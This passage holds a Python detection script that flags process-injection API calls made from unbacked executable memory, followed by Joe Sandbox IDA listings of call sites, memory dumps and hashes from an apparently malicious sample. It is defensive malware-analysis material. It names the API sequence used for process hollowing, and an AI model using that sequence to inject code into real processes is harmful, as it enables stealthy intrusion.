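    return those whose calls cover every stage of INJECTION_STAGES."""
    regions = list(regions)
    by_region: Dict[Region, Set[str]] = {}
    for call in calls:
        region = region_for(call.caller, regions)
        if region is None or not region.executable or region.image_backed:
            continue  # unmapped, non-executable, or image-backed code
        by_region.setdefault(region, set()).add(call.api)
    hits: List[Tuple[Region, List[str]]] = []
    for region, apis in by_region.items():
        if all(apis & stage for stage in INJECTION_STAGES):
            hits.append((region, sorted(apis)))
    return hits


# Constructed from the report. 00E50000: dumped region with "based on PE: false",
# protection 0x40 and type 0x20000 (read off the dump file name by assumption
# about its field order). 00E71000: code section of the PE image at 00E70000.
# Both sizes are assumptions, chosen to cover the listed call sites.
SAMPLE_REGIONS = [
    Region(base=0x00E50000, size=0x10000, protect=PAGE_EXECUTE_READWRITE, mem_type=MEM_PRIVATE),
    Region(base=0x00E71000, size=0x8E000, protect=PAGE_EXECUTE_READ, mem_type=MEM_IMAGE),
]

SAMPLE_CALLS = [
    ApiCall(0x00E51A5B, "CreateProcessW"),
    ApiCall(0x00E51AF1, "Wow64GetThreadContext"),
    ApiCall(0x00E51B13, "ReadProcessMemory"),
    ApiCall(0x00E735D4, "RegOpenKeyExW"),
    ApiCall(0x00E735F5, "RegQueryValueExW"),
    ApiCall(0x00E73617, "RegCloseKey"),
    ApiCall(0x00ED9B45, "CreateFileW"),
    ApiCall(0x00ED9B5B, "SetFileTime"),
]


if __name__ == "__main__":
    for region, apis in find_injection_from_unbacked_memory(SAMPLE_CALLS, SAMPLE_REGIONS):
        print(f"injection primitive from unbacked executable region {region.base:#010x}: {', '.join(apis)}")
```

Run as a script it reports the 00E50000 region only; the registry and file calls made from the image code section are attributed to an image-backed region and never enter the stage check. The stage sets are deliberately broad (A/W variants, the native 64-bit GetThreadContext, WriteProcessMemory and NtWriteVirtualMemory) so the same check covers the write side of hollowing that this particular function does not show.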
                    APIs
                      • Part of subcall function 00E75045: _fseek.LIBCMT ref: 00E7505D
                      • Part of subcall function 00ED99BE: _wcscmp.LIBCMT ref: 00ED9AAE
                      • Part of subcall function 00ED99BE: _wcscmp.LIBCMT ref: 00ED9AC1
                    • _free.LIBCMT ref: 00ED992C
                    • _free.LIBCMT ref: 00ED9933
                    • _free.LIBCMT ref: 00ED999E
                      • Part of subcall function 00E92F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E99C64), ref: 00E92FA9
                      • Part of subcall function 00E92F95: GetLastError.KERNEL32(00000000,?,00E99C64), ref: 00E92FBB
                    • _free.LIBCMT ref: 00ED99A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                    • Instruction ID: 9380df5a4be3717832490c73cf1766dbd14c703021bc052efbc5ce0ef55ad866
                    • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                    • Instruction Fuzzy Hash: 4B516EB1904218AFDF249F64CC81AAEBBB9EF48310F0054AEB609B7341DB715E81CF58
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                    • String ID:
                    • API String ID: 2782032738-0
                    • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction ID: 3f6cac453099906a3919d695f42c9aca0de200aa7605659fdad44d18d272c154
                    • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction Fuzzy Hash: 0E41D6B0A006069BDF28CE69C880DAF77A5EF84364B24A17DE855E76D0E7B09D428744
                    APIs
                    • _memset.LIBCMT ref: 00EAEE62
                    • GetOpenFileNameW.COMDLG32(?), ref: 00EAEEAC
                      • Part of subcall function 00E748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E748A1,?,?,00E737C0,?), ref: 00E748CE
                      • Part of subcall function 00E909D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E909F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Name$Path$FileFullLongOpen_memset
                    • String ID: X
                    • API String ID: 3777226403-3081909835
                    • Opcode ID: d0c02f33132e4088d6164fdc1bf2d107aeb86ac62574f04b8cf37db03e96f0b2
                    • Instruction ID: 51987417e392977333876d3efedd8b7e1782d45b5b5d497c36a25ad85b33d819
                    • Opcode Fuzzy Hash: d0c02f33132e4088d6164fdc1bf2d107aeb86ac62574f04b8cf37db03e96f0b2
                    • Instruction Fuzzy Hash: CE21C070A042989BCF51DF94D845BEE7BF89F49314F00805AE508FB282DBF859898BA1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __fread_nolock_memmove
                    • String ID: EA06
                    • API String ID: 1988441806-3962188686
                    • Opcode ID: fc43cc2337615227d39750956cb4a0b193d89d4df2b177ad52e3b4c59ccf53bb
                    • Instruction ID: 3a7350137429ebed2aa65b9b4f1f7550f88e8a538b3d116c00e33630f62b4fc8
                    • Opcode Fuzzy Hash: fc43cc2337615227d39750956cb4a0b193d89d4df2b177ad52e3b4c59ccf53bb
                    • Instruction Fuzzy Hash: AE01F9728042586EDF29C6A8DC16EEE7BFCDB01301F00419BF552E2181E5B5E6048B60
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 00ED9B82
                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00ED9B99
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    • Opcode ID: 7377799282e648ee3b97351ea58e8096d766caa4f5a07cf1b8456207a172e318
                    • Instruction ID: 1c36f95b4490c169c795af3b608a84f6bcda3c46b875cd1e5bb7c2f693d5d7de
                    • Opcode Fuzzy Hash: 7377799282e648ee3b97351ea58e8096d766caa4f5a07cf1b8456207a172e318
                    • Instruction Fuzzy Hash: 45D05B7554030DAFDB10DB94DC0DFA6772CEB44701F0041A1FE54D11B1DDB09598CB91
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4f0417905c7ef22f8b99ef4b2d1485259e5c5a37785a7c9cdbb5b0d24cb0b5d2
                    • Instruction ID: 603e60de9655a59847c5dea68de5136e313ab3308a1d2b86c05a68a0cd6abd52
                    • Opcode Fuzzy Hash: 4f0417905c7ef22f8b99ef4b2d1485259e5c5a37785a7c9cdbb5b0d24cb0b5d2
                    • Instruction Fuzzy Hash: 23F15B715083459FC714DF29C880A6ABBE5FF88314F14992EF899AB352D731E946CF82
                    APIs
                      • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E903D3
                      • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E903DB
                      • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E903E6
                      • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E903F1
                      • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E903F9
                      • Part of subcall function 00E903A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E90401
                      • Part of subcall function 00E86259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E7FA90), ref: 00E862B4
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E7FB2D
                    • OleInitialize.OLE32(00000000), ref: 00E7FBAA
                    • CloseHandle.KERNEL32(00000000), ref: 00EB49F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                    • String ID:
                    • API String ID: 1986988660-0
                    • Opcode ID: 6dd382ae33ca4c212a65e16fd66a3ab2febb285d7e7a4e8fd1cd2120bfa34179
                    • Instruction ID: 7e0afae64bde6b127f8b4022bbdc2f0a27f3bd36dce697a08c6d00cef624cc28
                    • Opcode Fuzzy Hash: 6dd382ae33ca4c212a65e16fd66a3ab2febb285d7e7a4e8fd1cd2120bfa34179
                    • Instruction Fuzzy Hash: D181B8B0D05248EEC784EF2AE9416657BE6FB99338750D13AE419DB362EB318405EF60
                    APIs
                    • _memset.LIBCMT ref: 00E74401
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E744A6
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E744C3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: IconNotifyShell_$_memset
                    • String ID:
                    • API String ID: 1505330794-0
                    • Opcode ID: 9c6486934dec2357874c7e4fee24d48f29720651c6833707a9c051d1c4a98ef1
                    • Instruction ID: 1917528aba760e2f02fd0fc493a13c0a00476ace689a94f2e07a438dce167d3a
                    • Opcode Fuzzy Hash: 9c6486934dec2357874c7e4fee24d48f29720651c6833707a9c051d1c4a98ef1
                    • Instruction Fuzzy Hash: 533180B05043019FD720DF24D884697BBE8FB49318F00492EE5AAE3291E771A948DB52
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 00E95963
                      • Part of subcall function 00E9A3AB: __NMSG_WRITE.LIBCMT ref: 00E9A3D2
                      • Part of subcall function 00E9A3AB: __NMSG_WRITE.LIBCMT ref: 00E9A3DC
                    • __NMSG_WRITE.LIBCMT ref: 00E9596A
                      • Part of subcall function 00E9A408: GetModuleFileNameW.KERNEL32(00000000,00F343BA,00000104,?,00000001,00000000), ref: 00E9A49A
                      • Part of subcall function 00E9A408: ___crtMessageBoxW.LIBCMT ref: 00E9A548
                      • Part of subcall function 00E932DF: ___crtCorExitProcess.LIBCMT ref: 00E932E5
                      • Part of subcall function 00E932DF: ExitProcess.KERNEL32 ref: 00E932EE
                      • Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68
                    • RtlAllocateHeap.NTDLL(014A0000,00000000,00000001,00000000,?,?,?,00E91013,?), ref: 00E9598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    • Opcode ID: d379c5f61122d71b7cadb353deeb2f91a8cf9d1bf4c7335a5f97723001215478
                    • Instruction ID: 7accaab88438d093b54602028f8737ff655c65e42b1c16264371e583a97149f3
                    • Opcode Fuzzy Hash: d379c5f61122d71b7cadb353deeb2f91a8cf9d1bf4c7335a5f97723001215478
                    • Instruction Fuzzy Hash: EE01D233201B15EEFE222B34D842AAE72D98F82738F10202AF525BA191DA70AD018760
                    APIs
                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00ED97D2,?,?,?,?,?,00000004), ref: 00ED9B45
                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00ED97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00ED9B5B
                    • CloseHandle.KERNEL32(00000000,?,00ED97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00ED9B62
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    • Opcode ID: a529806bd31b6128cffc9cade133ff683893a4424344b3976720c0daac2d4e24
                    • Instruction ID: 63757f258bacbf4560186655e8884c0c986bde67e84c6ac61fed79335e045e84
                    • Opcode Fuzzy Hash: a529806bd31b6128cffc9cade133ff683893a4424344b3976720c0daac2d4e24
                    • Instruction Fuzzy Hash: 25E02632181214BBD7211F51EC09FDE3B18EF45761F104220FB14780E083B12521C788
                    APIs
                    • _free.LIBCMT ref: 00ED8FA5
                      • Part of subcall function 00E92F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E99C64), ref: 00E92FA9
                      • Part of subcall function 00E92F95: GetLastError.KERNEL32(00000000,?,00E99C64), ref: 00E92FBB
                    • _free.LIBCMT ref: 00ED8FB6
                    • _free.LIBCMT ref: 00ED8FC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                    • Instruction ID: 6420fe5f7e47bf3503cd94f2d5be047e4d65173d7304b4c8e8cee454473fd42d
                    • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                    • Instruction Fuzzy Hash: 64E012B17097056ACE24A778AE40A9367EF9F48354B18281EB509FB242DE24F8428124
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID: CALL
                    • API String ID: 0-4196123274
                    • Opcode ID: af29a56b8f120bfe56f442afea42ff18cb9ec694bda13d2466edf750fadc3dba
                    • Instruction ID: c61c4ec44b79115a8db56c5ae2e9eec0ba0b5860b55960a5c56e4ffc8c155dd1
                    • Opcode Fuzzy Hash: af29a56b8f120bfe56f442afea42ff18cb9ec694bda13d2466edf750fadc3dba
                    • Instruction Fuzzy Hash: D8224870508341DFCB24DF14C490B6ABBE1FF84304F18996DE99AAB262D731ED85DB82
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: EA06
                    • API String ID: 4104443479-3962188686
                    • Opcode ID: e7787b7dd2dda245afbfa753d02a5feba8cd7d479604eaf6b0dae750541817bf
                    • Instruction ID: 2bcb1e3b5bb36dc67e859af7b3c604b71580c8a3895aef45c712af7fc22358c8
                    • Opcode Fuzzy Hash: e7787b7dd2dda245afbfa753d02a5feba8cd7d479604eaf6b0dae750541817bf
                    • Instruction Fuzzy Hash: 82417FB2A045585BCF115B648C517FE7FE6EB05314F58F065F88ABF2C2C7619D4083A1
                    APIs
                    • IsThemeActive.UXTHEME ref: 00E74992
                      • Part of subcall function 00E935AC: __lock.LIBCMT ref: 00E935B2
                      • Part of subcall function 00E935AC: DecodePointer.KERNEL32(00000001,?,00E749A7,00EC81BC), ref: 00E935BE
                      • Part of subcall function 00E935AC: EncodePointer.KERNEL32(?,?,00E749A7,00EC81BC), ref: 00E935C9
                      • Part of subcall function 00E74A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E74A73
                      • Part of subcall function 00E74A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E74A88
                      • Part of subcall function 00E73B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E73B7A
                      • Part of subcall function 00E73B4C: IsDebuggerPresent.KERNEL32 ref: 00E73B8C
                      • Part of subcall function 00E73B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F362F8,00F362E0,?,?), ref: 00E73BFD
                      • Part of subcall function 00E73B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00E73C81
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E749D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                    • String ID:
                    • API String ID: 1438897964-0
                    • Opcode ID: ff43c187215e1ed68c8006209ed8ea9e4613be4d68e55336c8846a86869efbac
                    • Instruction ID: f02aeac7d8ecf21c1fed18b0e66ceb95c5ef6a0467a16c082d4b0b9dd440fd36
                    • Opcode Fuzzy Hash: ff43c187215e1ed68c8006209ed8ea9e4613be4d68e55336c8846a86869efbac
                    • Instruction Fuzzy Hash: 3111ACB1918305AFCB00EF29DC0591AFBF8EF89720F00852EF448A32A2DB71D545DB92
                    APIs
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00E75981,?,?,?,?), ref: 00E75E27
                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00E75981,?,?,?,?), ref: 00EAE19C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: c38b998a59ed7a5b581b04038aa9563e4c9009c5e7f86844d17ecd320586ed25
                    • Instruction ID: ef74f206030e8f26a610b467aaab036a576a110497dfd0543ba1d8652550bed0
                    • Opcode Fuzzy Hash: c38b998a59ed7a5b581b04038aa9563e4c9009c5e7f86844d17ecd320586ed25
                    • Instruction Fuzzy Hash: BD014071244608BEF7250E24CC8AF767B9CEB0576CF10C719BAE97A1E0C6F45E598B50
                    APIs
                      • Part of subcall function 00E9594C: __FF_MSGBANNER.LIBCMT ref: 00E95963
                      • Part of subcall function 00E9594C: __NMSG_WRITE.LIBCMT ref: 00E9596A
                      • Part of subcall function 00E9594C: RtlAllocateHeap.NTDLL(014A0000,00000000,00000001,00000000,?,?,?,00E91013,?), ref: 00E9598F
                    • std::exception::exception.LIBCMT ref: 00E9102C
                    • __CxxThrowException@8.LIBCMT ref: 00E91041
                      • Part of subcall function 00E987DB: RaiseException.KERNEL32(?,?,?,00F2BAF8,00000000,?,?,?,?,00E91046,?,00F2BAF8,?,00000001), ref: 00E98830
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID:
                    • API String ID: 3902256705-0
                    • Opcode ID: 8e0cc2e6be86b6be0d605e637a280112a9268766da85436e4307ca23c020387c
                    • Instruction ID: cfe3a3ba8cf99ccf7c1fb75f31f866d39b1546c43659b8b1f63878d7d34dd948
                    • Opcode Fuzzy Hash: 8e0cc2e6be86b6be0d605e637a280112a9268766da85436e4307ca23c020387c
                    • Instruction Fuzzy Hash: 77F0283550031EA6CF20BA98ED059EF77EC9F01390F10106AFC04F6192DFB28E80A2E0
                    APIs
                    Memory Dump Source
